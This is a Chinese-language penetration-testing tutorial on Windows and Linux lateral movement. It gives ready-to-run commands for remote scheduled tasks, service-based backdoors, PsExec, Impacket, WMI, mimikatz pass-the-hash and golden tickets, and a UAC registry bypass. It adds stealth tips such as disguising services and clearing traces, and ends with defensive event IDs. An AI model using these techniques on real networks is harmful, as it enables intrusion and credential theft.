内网横向移动技术：原理、实战与防御

1. 内网横向移动技术全景解析

作为网络安全从业者，我们经常需要在内网环境中进行安全评估和渗透测试。横向移动技术是内网渗透中的关键环节，它允许攻击者在获取初始立足点后，逐步扩大控制范围。本文将系统性地介绍Windows和Linux环境下的主流横向移动技术，包括原理分析、实操演示和安全防护建议。

1.1 横向移动的基本概念

横向移动（Lateral Movement）是指攻击者在成功入侵内网某台主机后，以此为跳板继续渗透网络内其他主机的过程。这种技术之所以危险，是因为它利用了内网天然的信任关系，往往能绕过边界防御措施。

根据网络环境的不同，横向移动主要分为三种典型场景：

• 常规内网环境下的横向移动
• 通过代理通道进行的横向移动
• 通过远程控制木马维持的横向移动

1.2 横向移动的技术前提

进行有效的横向移动通常需要满足以下条件：

1. 已获取足够权限的凭据（如域管理员账号）
2. 掌握目标网络的基本拓扑信息
3. 具备在内网传输文件的能力
4. 了解目标系统的安全配置情况

重要提示：本文所有技术内容仅限合法授权的安全测试使用，未经授权实施这些技术可能构成违法行为。

2. 文件传输技术详解

在进行横向移动前，建立可靠的文件传输通道至关重要。以下是几种常用的内网文件传输方法。

2.1 网络共享利用技术

Windows网络共享是最基础的内网文件传输方式。通过IPC$共享，我们可以实现跨主机的文件操作：

bash复制# 查看默认共享
net share

# 建立IPC连接
net use \\10.10.10.10\IPC$ "password" /user:"administrator"

# 文件操作示例
copy payload.exe \\10.10.10.10\C$\Windows\Temp\

技术要点：

• 需要目标开启139/445端口
• 操作不会在目标主机留下明显日志
• 适用于Windows全版本

2.2 SMB服务器搭建

对于更复杂的场景，可以搭建临时SMB服务器：

bash复制# 快速创建匿名共享
net share test=C:\share /GRANT:Everyone,FULL

安全建议：

• 共享完成后应立即关闭
• 避免使用系统关键目录作为共享路径
• 考虑使用WebDAV作为替代方案

3. Windows横向移动技术实战

3.1 计划任务利用

计划任务是经典的横向移动技术，分为AT和SchTasks两种方式：

3.1.1 AT命令（Windows 2012以下版本）

bash复制net use \\192.168.1.100\IPC$ "Admin123" /user:domain\admin
copy payload.bat \\192.168.1.100\C$\
at \\192.168.1.100 15:00 C:\payload.bat

3.1.2 SchTasks（Windows 2012及以上版本）

bash复制schtasks /create /s 192.168.1.100 /ru SYSTEM /tn taskname /sc DAILY /tr C:\payload.bat /F
schtasks /run /s 192.168.1.100 /tn taskname /i

日志分析：

• 事件ID 106：计划任务创建
• Microsoft-Windows-TaskScheduler/Operational日志
• 会在目标主机留下明显痕迹

3.2 系统服务操控

通过SC命令创建远程服务：

bash复制sc \\victim create backdoor binpath= "C:\payload.exe"
sc \\victim start backdoor

注意事项：

• "binpath="后必须有一个空格
• 服务名应尽量伪装成系统服务
• 事件ID 7045会记录服务变更

3.3 PSEXEC工具套件

3.3.1 官方PsTools

bash复制PsExec.exe -accepteula \\192.168.1.100 -u domain\user -p password -s cmd.exe

3.3.2 Impacket工具包

python复制python psexec.py domain/user:password@192.168.1.100
python psexec.py -hashes :NTHASH domain/admin@192.168.1.100

技术特点：

• 需要Admin$共享
• 会创建临时服务PSEXESVC
• 事件ID 4624记录登录

4. 无文件横向移动技术

4.1 WMI远程执行

bash复制wmic /node:192.168.1.100 /user:admin /password:pass process call create "cmd.exe /c ipconfig > C:\result.txt"

优势：

• 默认不产生明显日志
• 使用135和445端口
• 支持无回显执行

4.2 WinRM远程管理

bash复制# 检查WinRM服务
winrm enumerate winrm/config/listener

# 执行远程命令
winrs -r:http://192.168.1.100:5985 -u:admin -p:pass "whoami"

配置要点：

• 默认端口5985(HTTP)/5986(HTTPS)
• 需要手动开启服务
• Windows 2008 R2以上默认安装

5. Linux环境横向移动

5.1 Impacket工具包应用

bash复制# WMI执行
python wmiexec.py domain/user:password@192.168.1.100

# SMB执行
python smbexec.py -hashes :NTHASH domain/admin@192.168.1.100

# 计划任务执行
python atexec.py domain/user:password@192.168.1.100 "whoami"

工具对比：

6. 凭证传递攻击深度解析

6.1 Pass-the-Hash技术

bash复制mimikatz # sekurlsa::pth /user:admin /domain:domain.com /ntlm:HASH

限制条件：

• 需要本地管理员权限
• Windows 8.1/2012 R2后受限
• 事件ID 4624记录登录

6.2 Pass-the-Ticket技术

bash复制mimikatz # kerberos::golden /user:admin /domain:domain.com /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi

黄金票据特点：

• 需要krbtgt账户的Hash
• 伪造TGT票据
• 需要DNS解析支持

7. 安全防护建议

7.1 防御措施

1. 权限控制

   • 遵循最小权限原则
   • 限制本地管理员组人数
   • 启用LSA保护

2. 日志监控

   • 集中收集安全日志
   • 重点关注事件ID：
     • 4624/4625：登录事件
     • 4672：特权登录
     • 7045：服务安装

3. 网络隔离

   • 实施网络分段
   • 限制SMB/WMI/WinRM访问
   • 启用Windows防火墙

7.2 检测技巧

1. 异常行为检测

   • 非工作时间的管理活动
   • 同一账号多地登录
   • 大量失败的登录尝试

2. 工具痕迹识别

   • PsExec服务创建
   • 异常的WMI事件
   • 可疑的计划任务

8. 实战经验分享

在实际渗透测试中，横向移动的成功率高度依赖于前期信息收集的完整度。以下是几个关键经验：

1. 环境适配

   • 老系统优先尝试AT命令
   • 新系统使用SchTasks
   • 域环境考虑票据传递

2. 隐蔽性控制

   • 尽量使用无文件技术
   • 操作后及时清理痕迹
   • 避免频繁触发告警

3. 绕过限制技巧

   • 遇到UAC限制时可尝试：

   reg复制reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
   

   • 防火墙阻挡时可尝试DNS隧道

最后提醒：所有技术都应在合法授权范围内使用，安全从业者更应注重如何防御这些攻击手法，切实提升企业网络安全防护水平。